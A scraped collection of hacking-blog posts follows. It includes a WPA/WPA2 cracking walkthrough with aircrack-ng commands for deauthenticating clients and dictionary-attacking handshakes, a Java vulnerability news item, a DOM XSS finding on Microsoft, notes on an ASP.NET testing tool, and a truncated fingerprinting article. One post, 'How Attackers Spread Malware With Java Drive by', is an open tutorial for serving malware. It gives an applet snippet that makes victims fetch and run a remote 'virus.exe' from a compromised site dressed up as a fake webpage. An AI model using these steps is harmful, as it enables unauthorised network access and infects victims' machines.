How To Crack A WPA Key With Aircrack-ng

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgehqnQQ95Y1qiAARJTt3_ktfmV-1K6g34-yfgV1C_S8awpdyPufr6K90I5hUSqGQAuatNjmvhSMyAxY4AsfRUo4zqPz1JNh2paNxLCkK8yntv-h1QUxHsCtjKqJj6DCxYgctgSPZvoiJe8/s1600/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgehqnQQ95Y1qiAARJTt3_ktfmV-1K6g34-yfgV1C_S8awpdyPufr6K90I5hUSqGQAuatNjmvhSMyAxY4AsfRUo4zqPz1JNh2paNxLCkK8yntv-h1QUxHsCtjKqJj6DCxYgctgSPZvoiJe8/s400/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" width="400" /></a></div><br /><br /><br />With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).<br /><a name='more'></a><br />Network Adapter I am going to use for WPA/WPA2 cracking is <b>Alfa AWUS036H</b> , <b>OS# Backtrack 5R2 </b><br /><br /><b>Step 1 : Setting up your network device </b><br /><br />To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:<br /><b>Command # iwconfig</b> (to find all wireless network interfaces and their status)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic7gwIN5ntS-PKiqkXLgHeaCl2olMGSj3ffDovCyX-v2M5BVyJvRtjQTDLTzsSjD7hqswUYwlrn7eKZwPgiwlSnng07cQ9-W6D3TA0Swr72Gwk2aMjoNEDkryRsgx5B79vwxRQshLDWlOb/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic7gwIN5ntS-PKiqkXLgHeaCl2olMGSj3ffDovCyX-v2M5BVyJvRtjQTDLTzsSjD7hqswUYwlrn7eKZwPgiwlSnng07cQ9-W6D3TA0Swr72Gwk2aMjoNEDkryRsgx5B79vwxRQshLDWlOb/s400/1.JPG" width="400" /></a></div><br /><b>Command # airmon-ng start wlan0</b> (to set in monitor mode, you may have to substitute wlan0 for your own interface name)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgprldsOQH2boV7fiGMHp-MG5jEeTEhq8jwLQIIwaG55-kSt1aFkSM9IWiV-LESAl5y0A4_L6vlaX_ajyAqAEUcRcVfpCFBE9ebvi1mGoPMsxuzp1bedKpPrdLnL5C5QllVU_VdOCeWsM03/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgprldsOQH2boV7fiGMHp-MG5jEeTEhq8jwLQIIwaG55-kSt1aFkSM9IWiV-LESAl5y0A4_L6vlaX_ajyAqAEUcRcVfpCFBE9ebvi1mGoPMsxuzp1bedKpPrdLnL5C5QllVU_VdOCeWsM03/s400/2.JPG" width="400" /></a></div><br /> <b>Step 2 : Reconnaissance </b><br /><b><br /></b>This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:<br /><br /><b>Command # airodump-ng mon0</b> (Monitors all channels, listing available access points and associated clients within range.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKxOFYC8NM6d8x25t7YzOBPSaUuhoTWATFPP7pHT4xp1ppjyI6ui2MVgDUCcYlLiR7Z8FjM2hohUtl7hzAe8e7tI8XK9woUm12A8pFNVhvfiZT0Fdy-HBI2un_oOZmYvkLx9Q4jViOzsk/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKxOFYC8NM6d8x25t7YzOBPSaUuhoTWATFPP7pHT4xp1ppjyI6ui2MVgDUCcYlLiR7Z8FjM2hohUtl7hzAe8e7tI8XK9woUm12A8pFNVhvfiZT0Fdy-HBI2un_oOZmYvkLx9Q4jViOzsk/s400/3.JPG" width="400" /></a></div><br /> <b>Step 3 : Capturing Packets </b><br /><b><br /></b>To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:<br /><br /><b>Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 </b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoGqO4aSqkh8TMcio-dVSFoN4pxR-AOanrSGb8n9IS_5YxOpTN5XD8h5UPaO4lKg1zNev2ibgxSO6d_EEQlBVJfShmprwEjbWfuyX1zJ_8hg-DCUKqDGMAd6ibaXesNPDbqsOUeMD1BFn/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoGqO4aSqkh8TMcio-dVSFoN4pxR-AOanrSGb8n9IS_5YxOpTN5XD8h5UPaO4lKg1zNev2ibgxSO6d_EEQlBVJfShmprwEjbWfuyX1zJ_8hg-DCUKqDGMAd6ibaXesNPDbqsOUeMD1BFn/s400/4.JPG" width="400" /></a></div><br /><b>Step 4 : De-Authentication Technique </b><br /><b><br /></b>To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:<br /><br /><b>Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0</b> (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3wA2eStwzcIgzFPpbPyR4W7WZPAtYi229sTn7kJS2jH1R0t57RhcX8JEEDIvGNtAgR-en4Lmm_fnI0xGGzuN5NzuhbDPwqKKVWrcmv69UKIU0WftMXcMg5Ga2evydMotanUFLZ_CPncZb/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3wA2eStwzcIgzFPpbPyR4W7WZPAtYi229sTn7kJS2jH1R0t57RhcX8JEEDIvGNtAgR-en4Lmm_fnI0xGGzuN5NzuhbDPwqKKVWrcmv69UKIU0WftMXcMg5Ga2evydMotanUFLZ_CPncZb/s400/5.JPG" width="400" /></a></div><br /> So, now we have successfully acquired a WPA Handshake.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLRLWTn8alegXWrxAqm9bZ8ia_rKV4iya7ESTGvkqr0uBA8N1jIAwhAWDcdNlW_fyxei-KUNNli8vlBVkUPIo0Rjm-Wmsz_dP5iCNlOKiI1-8nEDN8-Emk-tm8lOPpkcmktW57Dkq5BWy5/s1600/6-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLRLWTn8alegXWrxAqm9bZ8ia_rKV4iya7ESTGvkqr0uBA8N1jIAwhAWDcdNlW_fyxei-KUNNli8vlBVkUPIo0Rjm-Wmsz_dP5iCNlOKiI1-8nEDN8-Emk-tm8lOPpkcmktW57Dkq5BWy5/s400/6-1.jpg" width="400" /></a></div><br /> <b>Step 5 : Cracking WPA/WAP2 </b><br /><b><br /></b>Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.<br /><br /><b>Command # aircrack-ng -w wordlist ‘capture_file’.cap</b> (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4-Xr2d8RGXQpXc507fZWNrMCDzITNS9F3bQYajBbveR2oF9_Q3ltfVQsu62J4cYobpoJf0JqIzgm54pqr9NZ7lAJB9L3S1eWUFPHKXMCT2l9iwR2iYSz9LM8Fx6cikz_tSTS2jvOjqB3/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4-Xr2d8RGXQpXc507fZWNrMCDzITNS9F3bQYajBbveR2oF9_Q3ltfVQsu62J4cYobpoJf0JqIzgm54pqr9NZ7lAJB9L3S1eWUFPHKXMCT2l9iwR2iYSz9LM8Fx6cikz_tSTS2jvOjqB3/s400/7.JPG" width="400" /></a></div><br /><br />Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.<br />Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.<br /><br /><span style="color: #666666;"><b>About The Author </b></span><br /><span style="color: #666666;"><b><br /></b></span><b>Shaharyar Shafiq</b> is doing Bachelors in Computer Engineering from Hamdard University. He has done <b>C|PTE</b> (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.</div>

How To Crack A WPA Key With Aircrack-ng

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not...

+ Read more »

Java Hits Another Roadblock - Found To Be A Threat For Browsers

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06EsKsShFJad0AOX4IgAjO7nUJGUS5tQy58gRkxMxN_pJi2ajLgxN5Hn6NjM614QWnV21_km_4QEDN4bdL2EADKofFSAt7MgpPoXs8g9wEclmS_MIfjrFSeUcm3J4tqq3xHrKiZ5DRWE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06EsKsShFJad0AOX4IgAjO7nUJGUS5tQy58gRkxMxN_pJi2ajLgxN5Hn6NjM614QWnV21_km_4QEDN4bdL2EADKofFSAt7MgpPoXs8g9wEclmS_MIfjrFSeUcm3J4tqq3xHrKiZ5DRWE/s640/3.png" width="577" /></a></div><br />Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its <a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank"><b><span style="color: blue;">inability to refrain from being attacked and exploited</span></b></a>. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using <a href="http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html" target="_blank"><b><span style="color: blue;">various tactics</span></b></a>.<br /><br /><a name='more'></a><br />According to a report about a 100 million PCs are vulnerable to various attacks leading to unauthorized access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.<br /><br />Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYcK4m0gWxNj95TWUbkq9qUPx3OmuLs1i7v_4iTePiYWdFcwCEkbpgtIuvCVegV3BcbEQXmy3gwP0alwm364ly03blI-X-bbL3S66fTVocNH6XyleNKKCK7z8czUqG3tiZcaBX_C_cGc/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYcK4m0gWxNj95TWUbkq9qUPx3OmuLs1i7v_4iTePiYWdFcwCEkbpgtIuvCVegV3BcbEQXmy3gwP0alwm364ly03blI-X-bbL3S66fTVocNH6XyleNKKCK7z8czUqG3tiZcaBX_C_cGc/s640/2.png" width="577" /></a></div><b><u><br /></u></b><b><u>According to <a href="http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx" rel="nofollow" target="_blank"><span style="color: blue;">Websense</span></a>;</u></b><br /><br /><blockquote class="tr_bq"><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;">It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. </span></span><span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;">That's what the bad guys do </span><span style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;">—</span><span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"> examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.</span></blockquote><br /><blockquote class="tr_bq"><span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"><br /></span><span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;">Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and </span><i style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;">more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities</i><span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;">. And don't forget that if you're not on version 7 (which is 78.86% of you), </span><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;">Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.</span></span></blockquote><div style="text-align: left;"><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"><br /></span></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;">Cheers!</span></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"><br /></span></span></div><div style="text-align: -webkit-auto;"><span style="line-height: 17px;"><b>About the Author:</b></span></div><div style="text-align: -webkit-auto;"><span style="line-height: 17px;">This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"><br /></span></span></div></div>

Java Hits Another Roadblock - Found To Be A Threat For Browsers

Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its inability to r...

+ Read more »

ASP.NET web-application Testing

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;"></div><div style="margin-bottom: .0001pt; margin: 0cm;"><span style="font-family: Cambria, serif;">Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.<br /><br />You can Download source code from following website.<br /><br /><a href="http://ethicalhackingaspnet.codeplex.com/releases/view/52623">http://ethicalhackingaspnet.codeplex.com/releases/view/52623</a><br /><br />Currently the following tests are available:</span></div><div style="margin-bottom: .0001pt; margin: 0cm;"></div><span style="font-family: Cambria, serif;"><a href="http://ethicalhackingaspnet.codeplex.com/wikipage?title=ViewState%20test&referringTitle=Documentation" target="_blank">(1)Viewstate eavesdroping & information disclosure</a><br /><br /><a href="http://ethicalhackingaspnet.codeplex.com/wikipage?title=Session%20fixation%20test&referringTitle=Documentation" target="_blank">(2)Session Fixation</a><br /><br /><a href="http://ethicalhackingaspnet.codeplex.com/wikipage?title=Session%20fixation%20test&referringTitle=Documentation" target="_blank">(3)Oracle Padding</a></span><br /><div style="margin-bottom: .0001pt; margin: 0cm;"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYxIFP1SFD3_B3ciGwvf2gWs-hB7Uv7vG7PoB6drZte8b_e2j21XNPyIPheEJvxjwZNZlS2U04JwzKVw1dN9zqjG0wUCrloOJjvBYprpRVACkrwfxV6O_qIXcRLHbn3n6QqQy0roAkLNWV/s1600/Lens+-+ViewState.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYxIFP1SFD3_B3ciGwvf2gWs-hB7Uv7vG7PoB6drZte8b_e2j21XNPyIPheEJvxjwZNZlS2U04JwzKVw1dN9zqjG0wUCrloOJjvBYprpRVACkrwfxV6O_qIXcRLHbn3n6QqQy0roAkLNWV/s320/Lens+-+ViewState.png" width="320" /></a></div><a name='more'></a><br /><h3 style="text-align: left;"><a href="https://asafaweb.com/" target="_blank">ASafaWeb:- </a></h3><br /><a href="https://asafaweb.com/" target="_blank">Automated Security Analyser</a> for ASP.NET Websites . ASafaWeb simply makes HTTP requests to the site and looks for responses which suggest there might be configuration issues.</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <br /><div style="margin-bottom: .0001pt; margin: 0cm;"><span style="font-family: Cambria, serif; font-size: 16pt;"><!--[if !supportLineBreakNewLine]--><!--[endif]--><o:p></o:p></span></div><u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p> <u1:p></u1:p><br /><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"></div></div>

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its...

+ Read more »

DOM Based XSS In Microsoft

<div dir="ltr" style="text-align: left;" trbidi="on">           <img src="https://twimg0-a.akamaihd.net/profile_images/1272438885/DOMInatrixss.png" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px; text-align: center;" /><br />Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the <a href="http://www.rafayhackingarticles.net/2013/02/dom-based-xss-in-avg.html">DOM based XSS i found inside AVG</a>, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.<br /><a name='more'></a><br />I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiozfcs7Nwv2Cs59POcU2WYcnxoWDwLtO0Jo_khQ1aEsYNuT958zP_xGxerces2pGJIajMBUHf7dfoelZ2lPpt1uzT-_viVmf_xVASyuyc3ICXzvDf2FFYZQGS6d9ltQcGNAvP9KmrDo_I/s1600/MS+DOMXSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiozfcs7Nwv2Cs59POcU2WYcnxoWDwLtO0Jo_khQ1aEsYNuT958zP_xGxerces2pGJIajMBUHf7dfoelZ2lPpt1uzT-_viVmf_xVASyuyc3ICXzvDf2FFYZQGS6d9ltQcGNAvP9KmrDo_I/s640/MS+DOMXSS.png" width="577" /></a></div><br />The vulnerability occurs due to lack of filtering being done inside <b>riotracking script </b>(Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwJv6clZ1u9dvYn5rZkb2pOCpUK3JaKEs8u6c5CWW2iZbpMA5xfrB-OnlfWoG_IOnecuw3iOjbLkPOar1aTMnfnleIo4Xz1oLQfGhWaFWSJVTEde263zehKEW2SOTBMzgXHQ5EqD664s/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwJv6clZ1u9dvYn5rZkb2pOCpUK3JaKEs8u6c5CWW2iZbpMA5xfrB-OnlfWoG_IOnecuw3iOjbLkPOar1aTMnfnleIo4Xz1oLQfGhWaFWSJVTEde263zehKEW2SOTBMzgXHQ5EqD664s/s640/Untitled.png" width="577" /></a></div></div>

DOM Based XSS In Microsoft

            Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the DOM based XSS i found inside AVG ...

+ Read more »

How Attackers Spread Malware With Java Drive by?

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://www.foto.pk/images/cpature.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.foto.pk/images/cpature.jpg" /></a></div><br />Hello RHA fans,<br /><br />We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.<br /><br /><a name='more'></a><br /><br />Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!<br /><h4>What is java drive by:</h4>A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click <b>"Run</b>" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://foto.pk/images/capturlcl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://foto.pk/images/capturlcl.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job. <br /><h4>Tools we need in this game are: </h4><b>i) </b>a .jar file which is the main player of this game. Download it from here <b>http://www.mediafire.com/?mmafl2carb1s159 </b><br /><b>ii) </b>A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. <br /><b>iii) </b>A java script which is the backbone of your game. <br /><br />Now lets get started, Upload you <b>.jar file</b> on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear <br /><h4>Java Code: </h4><i><APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"></i><br /><i>    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe"> </i><br /><br /><br />So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.foto.pk/images/capturfzf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="http://www.foto.pk/images/capturfzf.png" width="640" /></a></div> So this is it! Simplest and most effective method used by attackers to spread your malicious software.<br /><h4> About the author </h4><div>This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials. </div></div>

How Attackers Spread Malware With Java Drive by?

Hello RHA fans, We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for v...

+ Read more »

Web-application Fingerprinting

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><br />Methods of Web Application Finger Printing<br /><br />Historically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards identification of web application running on remote machine.<br /><br />HTML Data Inspection<br /><br />This is the simplest method in which manual approach is to open the site on browser and look at its source code, similarly on automated manner your tool will connect to site, download the page and then will run some basic regular expression patterns which can give you the results in yes or no. Basically what we are looking for is unique pattern specific to web software. Examples of such patterns are<br /><div class="separator" style="clear: both; text-align: center;"></div><br />1) Wordpress<br />Meta Tag Folder Names<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqyg3i2xZkIQngv3T-LbTH_PURar-YvD9TO2xOwr1jaC0JbUrRLNbPket7-6IjBzeKDuxzVSiZApx0xiGP9kzNmkhrjXuQBK-cZFf9rWcxbkXzqbzKg0g8E9jfJn6G2Fg5jHYrS-XYqN1/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-1" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqyg3i2xZkIQngv3T-LbTH_PURar-YvD9TO2xOwr1jaC0JbUrRLNbPket7-6IjBzeKDuxzVSiZApx0xiGP9kzNmkhrjXuQBK-cZFf9rWcxbkXzqbzKg0g8E9jfJn6G2Fg5jHYrS-XYqN1/s1600/1.png" title="Web-application Fingerprinting-1" /></a></div><br />Folder Names in Link section<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4hNi0o_2KQl0UBBs0Me7w_Cfc38XBXRjcU3zeBYM-iaUn5a0sFdf7bAC7fPLxxvbquRsNmW1eZD3JfW2OJHVazF7-yeA7EdIX5m0mPn8GLiqkxX2UoR5bIAcuMxM-tGIAdivHwWIt2m5V/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-2" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4hNi0o_2KQl0UBBs0Me7w_Cfc38XBXRjcU3zeBYM-iaUn5a0sFdf7bAC7fPLxxvbquRsNmW1eZD3JfW2OJHVazF7-yeA7EdIX5m0mPn8GLiqkxX2UoR5bIAcuMxM-tGIAdivHwWIt2m5V/s1600/2.png" title="Web-application-Fingerprinting-2" /></a></div><br />Ever green notice at the bottom<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio3CWMUhovEcjrklqP5W9_v8T_lhO8Xj_lerQ2i1kHvdiDBdwGj6QRe7J54kEMgtXirTXHSZeVFHoSECOjI73YqrNvjRbug5kwgdt1iOkYMZFP_LV3dkdH196eM-XVvUuB3av4JmqAHuGn/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-3" border="0" 